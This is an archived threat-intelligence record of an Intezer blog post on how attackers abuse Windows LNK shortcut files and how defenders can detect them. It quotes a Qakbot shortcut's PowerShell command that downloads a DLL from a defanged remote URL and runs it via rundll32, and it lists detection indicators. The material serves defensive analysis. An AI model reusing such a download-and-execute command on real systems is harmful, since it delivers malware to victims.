{ "id": "7ad8522a-6817-4ce4-b22d-b03c537bcef2", "created_at": "2026-04-06T00:12:49.467833Z", "updated_at": "2026-04-10T03:21:19.488798Z", "deleted_at": null, "sha1_hash": "83f81ebf23830ac896d1b46e55617138e115ee75", "title": "How LNK Files Are Abused by Threat Actors", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 432711, "plain_text": "How LNK Files Are Abused by Threat Actors\r\nBy Nicole Fishbein\r\nPublished: 2022-11-10 · Archived: 2026-04-02 12:02:07 UTC\r\nLNK files are based on the Shell Link Binary file format, also known as Windows shortcuts. But what seems a\r\nrelatively simple ability to execute other binaries on the system can inflict great harm when abused by threat\r\nactors.\r\nMicrosoft’s decision to block macros by default for files downloaded from the internet in Office applications\r\nprovoked malware developers to shift to other techniques. Threat actors have identified the potential profit of\r\nusing LNK files in different stages of attacks as we expect to see an increased number of attacks using LNK files,\r\nsuch as Bumblebee and Quantum Ransomware.\r\nIn this blog, we will cover the file format to understand better how threat actors use LNK files in the different\r\nstages of attacks. By getting familiar with the LNK (Shell Link) file format and its capabilities, we will present\r\nopen-source tools and methods to inspect and detect malicious LNK files in incident response and threat-hunting\r\nprocesses.\r\nWhat is the LNK File Format?\r\nThe five structures that compose a shell link binary (LNK) file.\r\nAccording to Microsoft’s documentation on Shell Link Binary files, the most common way to store Shell Link\r\nBinary files is by using the .lnk file extension. LNK files contains a reference to a location on the system referred\r\nto as a link target. The format consists of five structures: some are mandatory, while others are optional. We will\r\nnot cover every parameter in the structures, but focus on the parameters that can help identify suspicious LNK\r\nfiles.\r\n1. SHELL_LINK_HEADER – This is a mandatory structure that contains information and flags necessary for\r\nthe rest of the structures in the file.\r\nLinkFlags structure specific, which shell link structures (described below) are present in the file. For\r\nexample, if the HasRelativePath flag is set, RELATIVE_PATH in the STRING_DATA structure will\r\ncontain the relevant information.\r\nFileAttributesFlags structure holds information about the attributes of the link target. For example, if the\r\nFILE_ATTRIBUTE_DIRECTORY bit is set, the target is a directory rather than a file. The fields in this\r\nstructure can provide more context about the link target, which can help the investigation process.\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 1 of 5\n\nAccess, creation, and write time: this can be useful to determine the creation and modification time of the\r\nfile as part of an incident response process.\r\nHotKeyFlags structure specifies a combination of keys that will invoke the application.\r\n2. LINKTARGET_IDLIST – Specifies the target of the link using ItemID structure.\r\n3. LINKINFO – Holds information about the location of a link target, including volume, serial number, and local\r\npaths.\r\n4. STRING_DATA – Holds information about paths and interfaces for the link target. The structures are optional,\r\nand they will be present only if the appropriate flag in LinkFlags (in the ShellLinkHeader) is set. The following\r\nstructures can be useful in identifying malicious LNK files:\r\nRELATIVE_PATH: defines the location of the link target relative to the file that contains the shell link.\r\nWORKING_DIR: defines the file system path of the working directory to be used when activating the link\r\ntarget.\r\nCOMMAND_LINE_ARGUMENTS: stores the command-line arguments specified when activating the\r\nlink target.\r\n5. EXTRA_DATA – Optional structures contain additional information about the link target.  Of all of the\r\npossible structures, the following can be very useful in the investigation:\r\nIf the link target uses an environment variable, the EnvironmentVariableDataBlock structure will hold a\r\npath to environment variable information.\r\nTrackerDataBlock: this structure holds information that helps locate the link target if it wasn’t found in its\r\noriginal location. One of the fields is the MAC address of the machine where the link target was last seen.\r\nIf the MAC address specified in the LNK file doesn’t match the MAC address of the host, it means that\r\nLNK was created on another machine. So we need to understand if it’s a machine within the organization\r\nor an authorized entity or if the file was created and dropped by an attacker.\r\nHow LNK files are used by threat actors\r\nLNK files can execute any file on the system with arguments (path, arguments, etc.) based on the configuration\r\nprovided by the file’s creator. The content of the LNK file – what and how it will be executed – can be viewed\r\nusing different tools or just by right-clicking it to open the properties window of the file. But most users don’t\r\ncheck each LNK file before executing it. Essentially LNK files provide attackers with an easy way to execute\r\nmalicious binaries or trusted leaving-of-the-land binaries (LolBins).\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 2 of 5\n\nInspecting LNK files using the properties window.\r\nUsually, LNK files are used in the delivery stage of the attack. The goal of this stage is to deploy the next stage of\r\nthe attack or execute the malware. One of the ways to deliver the malicious files to the endpoint is using an\r\narchive file, a technique that attackers started to use more extensively based on HP’s report from Q2 2022.\r\nRecently, attackers started to use LNK files as downloaders instead of packing the malicious code in the archive or\r\nusing other file formats, such as macros. To carry out the attack, LNK files are set to execute either PowerShell,\r\nVBScript, or MSHTA with pre-defined arguments or execute commands from another file that is dropped with the\r\nLNK file.\r\nEmotet used this technique in a phishing email they sent to the victims, including a password-protected zip file\r\nthat contained an LNK file disguised as a Word document that executes a VBS script which downloads malware.\r\nBumblebee, a new and advanced loader, uses an LNK file as part of the attack flow. So far, it has two versions,\r\none delivered ISO file and the latter a VHD. In both cases, an LNK file is included. In the first version, the LNK\r\nexecuted the accompanying DLL, which contains the malicious payload. The later version is more advanced, and\r\nthe LNK file executes an attached PowerShell file that loads the second stage of the loader.\r\nSome malware developers took it one step further and created a tool for creating malicious LNK files called\r\nQuantum, and it’s sold on the dark web. It allows other criminals to create malicious files with extra capabilities\r\nsuch as UAC bypass, delayed execution, post-execution hiding, and a variety of double extensions.\r\nHow to Analyze and Detect Malicious LNK Files\r\nIn the process of incident response or threat hunting, when we have a suspicious file, we can choose to do static\r\nanalysis or dynamic analysis (or both). Executing an LNK file in a sandbox or a VM can greatly assist in\r\nidentifying suspicious activity. However, as we saw in the examples above, some attacks rely on additional files\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 3 of 5\n\nand parameters that the LNK file will execute. In this case, we will need to have all of the relevant files in the\r\ntesting environment, and this is not always possible so we will proceed to a static analysis.\r\nThere are multiple applications and tools to inspect the structure of an LNK file. In this post, we will use\r\nLnkParse3, a minimalistic CLI tool based on python3 that is easy to install and use. The result of the parsing is\r\npresented in a format that resembles the LNK structure described above.\r\nBased on LNK files that were used in previously reported attacks, we have gathered indicators that can help\r\nidentify suspicious LNK files. This information can be pulled from the LNK file using tools such as LnkParse3:\r\nLocal base path that points to legitimate Windows tools that can be used to execute scripts and open URLs:\r\ncmd, rundll32, PowerShell, MSHTA.\r\nSuspicious command line arguments that contain:\r\nCommands like exec, frombase64, ping, VBScript, etc.\r\nHigh amount of command line arguments – often malicious LNK files that specify command line\r\narguments will have more than four arguments. On top of that, the arguments can be obfuscated or\r\ninclude characters that are not letters or numbers. But in some cases, legitimate files such as web\r\nbrowsers can run processes with many arguments, resulting in shortcut files with many command\r\nline arguments. In this case, the target and the working_dir locations can be very helpful in the\r\nanalysis and inspection of the command line arguments.\r\nNetworking protocols and URLs such as HTTP, HTTPS, and IP addresses.\r\nThe file size is relatively big – which indicates that it contains lots of data, possibly a script. We noticed\r\nthat files bigger than 4 KB should be considered suspicious files.\r\nFor example, below is the content of an LNK file used by Qakbot. It downloads a DLL from a remote location and\r\nexecutes it.\r\n“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoExit iwr -Uri\r\nhxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile\r\n$env:TEMPtest.dll;Start-Process rundll32.exe $env:TEMPtest.dll,jhbvygftr”\r\nWe can then use URL reputation tools for analysis, like Intezer’s URL scanning feature shown below, to confirm\r\nthat the LNK file is opening a malicious link.\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 4 of 5\n\nIntezer’s URL scanner showing the malicious link opened by a .lnk file.\r\nSome of the indicators can differ based on what is considered common in the organization, for example, if it is\r\ncommon to have big LNK files that execute legitimate scripts. In this case, the indicators need to be tailored for\r\nthe organization, but overall malicious LNK files have a pattern that can be identified.\r\nOnce we have classified an LNK file as suspicious, we should inspect the executables and the commands that are\r\nbeing executed and identify what the purpose of the file is and whether the endpoint was compromised.\r\nConclusion\r\nWith the increasing use of LNK files by threat actors, defenders and incident responders must understand what\r\nthese files can do and how to work around them. In this blog, we covered the sections of the file format that can\r\nreveal suspicious indicators, then we presented real-life examples and presented an open-sourced tool that can be\r\nused to inspect LNK files.\r\nToo many alerts and suspicious files to investigate manually?\r\nIntezer’s technology automates SOC grunt work like analyzing suspicious files, by monitoring your alerts 24/7,\r\ninvestigating and triaging for you, kickstarting incident response, and helping you hunt down undetected threats.\r\nTry Intezer for yourself for free\r\nSource: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/" ], "report_names": [ "how-threat-actors-abuse-lnk-files" ], "threat_actors": [], "ts_created_at": 1775434369, "ts_updated_at": 1775791279, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.pdf", "text": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.txt", "img": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.jpg" } }